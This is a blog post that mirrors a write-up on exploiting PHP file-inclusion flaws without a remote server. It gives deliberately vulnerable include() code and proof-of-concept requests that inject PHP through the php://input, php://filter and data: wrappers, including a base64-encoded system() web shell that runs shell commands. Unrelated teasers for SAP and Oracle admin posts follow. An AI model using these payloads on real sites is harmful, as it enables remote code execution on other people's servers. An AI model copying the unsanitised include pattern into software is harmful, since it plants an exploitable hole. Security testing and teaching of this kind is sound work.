Self Contained RFI in PHP

-
This is a direct rip from here : http://www.cr0w.ru/2009/03/self-contained-file-include-in-php-520.html It is for my own record, and can be seen as a mirror. :)

Sometimes those two tricks may be useful in RFI attacks.

1. Using php://input wrapper

php://input wrapper allows you to read raw POST data (http://ru2.php.net/wrappers.php).

For example, there is such code: sini2


<? 
if ( include($_GET['file'] . '.php') ) {
    echo 'Henck!';  } else {
    echo 'Error!'; }  
?>


For exploitation we need:

allow_url_include=On
magic_quotes_gpc=Off

PoC:

POST http://site.com/index.php?file=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>


Also using additional php://filter wrapper (available since PHP 5.0.0) we can encode our php code:

POST http://site.com/index.php?file=php://filter/read=string.rot13/resource=php://input HTTP/1.1
Host: site.com

<?php passthru('dir'); ?>


2. Using data: wrapper

Since version 5.2.0 PHP supports "data" URL scheme (http://ru.php.net/manual/ru/wrappers.data.php).

Example code:


<?php 
$file = $_GET['file'];  // Filtration of directory change and URLs:   
$file = str_replace('/', '', $file); 
$file = str_replace('.', '', $file);  
if ( include($file . '.php') ) {
     echo 'Henck!';  } else {
     echo 'Error!'; }  
?>


For exploitation we need:

PHP version => 5.2.0
allow_url_include=On

PoC:

http://site.com/index2.php?file=data:,<?php system($_GET[c]); ?>?&c=dir


It's possible to encode this php code into Base64:

http://site.com/index2.php?file=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir


This methods are interesting because attacker don't need to include his php-code from any http/ftp/etc server. Also attacker can bypass some simple filtrations like in second example code.

kudos to original writer, http://www.cr0w.ru
//alak

Comments

Post a Comment

Popular posts from this blog

SAP: Segregate Different SMTP Mail Server Based on Sender Domain

-
Image
  Requirement : An SAP server, with a single Productive client shared by multiple company codes. Each CoCode would have their own domain (FQDN), and any email send out, for example PO to vendors, are to be sent using each individual CoCode SMTP mail server. Solution Steps: 1. Configure multiple SMTP nodes in Tx SCOT, limiting each node with a Sender Group 2. Set different Sender Group (CDG) parameters for each user of each CoCode (Tx SU01 > Parameters) 3. Test using SCOT's Routing Test feature 4. Profit Detail Step: Logon to SAP system and configure multiple SMTP Node, can use  Continue with SCOT Wizard. Once you get multiple Nodes (as per below screenshot), double click any of them,  In this example, we double click on the "SECOND" node. And then click on "Set" button for the address type you want to configure (that would most probably be for INT type) And click the Pencil icon for setting the Sender Group Here we can set based on FQDN or any string. We are ...
Read more

SAP Client Copy Error: Errors occurred during export of container object FINB-TR-DERIVATION

-
 Reference from: https://www.consultoria-sap.com/2010/03/client-copy-derivation-rule-tables-are.html TL;DR - Execute report ABADRCHECK with selected 'DELSTEPS' //alak ==== Client copy is completed with status "Post-Processing Required". There is an error in log for object FINB-TR-DERIVATION: DA300 "No active nametab exists for *some db table*" Name of db table is usually with naming convention: xxyyyysssmmmnnnn (xx - application class, yyyy - strategy ID, sss - system indicator, mmm - client, nnnn - sequence number) These db tables are part of some instance of derivation tool in your system and are used to store Derivation Rule Values. Other terms ABADR, FINB_TR_CC_EXIT, FINB_TR_CC_EXIT_TARGET, DA 300, DA300, CC, SCC9, SCCL, SCC3 Reason and Prerequisites During processing CC there was huge workload into your system. CC processcreates new tables to store copied derivation rules. This is done in parallel asynchronous process. But due to workload into system, t...
Read more

Quick Dirty Script for Checking Oracle Data Gurad Gap and Emailing it

-
 Situation: primary DB: prd_CCC standby DB: prd_WWW file 1: gap-check.bat @echo off cls echo. echo. echo This script checks for Archive Logs at prd_ccc and Applied Logs at prd_www echo. echo Querying prd_ccc (Primary) echo select max(sequence#) "Primary" from v$archived_log where archived='YES';|sqlplus -s / as sysdba echo Querying prd_www (Standby) echo select max(sequence#) "Standby" from v$archived_log where applied='YES';|sqlplus -s / as sysdba echo. DGMGRL / "show configuration" date /t && time /t && hostname && whoami file 2: emailer.ps1 $Username      = "username" $EmailPassword = "password" $today = Get-Date $Username = $Username $EmailTo = "adam@jasabyte.com"  $EmailFrom = "server@jasabyte.com" $Body = Get-Content .\status.log -Raw $Subject = "PRIMARY/STANDBY DB GAP - $today" $SMTPServer = "mail.smtp2go.com"  $SMTPMessage = New-Object System.Net.Mai...
Read more